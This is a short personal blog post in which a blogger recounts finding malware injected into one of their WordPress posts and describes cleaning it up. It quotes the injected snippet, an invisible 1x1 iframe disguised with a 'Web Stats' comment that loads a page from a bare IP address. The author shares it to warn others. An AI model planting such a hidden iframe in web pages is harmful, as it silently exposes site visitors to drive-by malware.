This morning at about 8AM my fellow tiny house blogger, Kent Griswold, let me know that this site was creating a security alert in Safari. The alert said that my site contained Malware. Immediately I started digging and within 20 minutes had figured it out. I’m not sure how it was done but a little tiny bit of code was stuck into one of my posts. Here is the code. Don’t worry it’s disabled but I would not recommend visiting that website.
<!– Web Stats –> <iframe src=http://18.104.22.168/stats.php?id=2 width=1 height=1 frameborder=0></iframe> <!– End Web Stats –>
It was only partly visible in html view, the iframe wouldn’t render so it looked virtually invisible. I changed my password, locked down my comments, and tightened up security. I suspect there may be a security hole in the current version of WordPress, but who knows it could have been some plug-in I was testing too.
I’m going to spend a little time later tonight changing passwords on all my blogs and doing what I can to protect myself. If you run blogs I suggest you try doing some searches for Malware too.
Lucky for me they picked my least busy blog, this one, my personal blog. It would seriously suck if my top blogs popped up warning screens like this one to all my visitors. Fricken hacker bastages!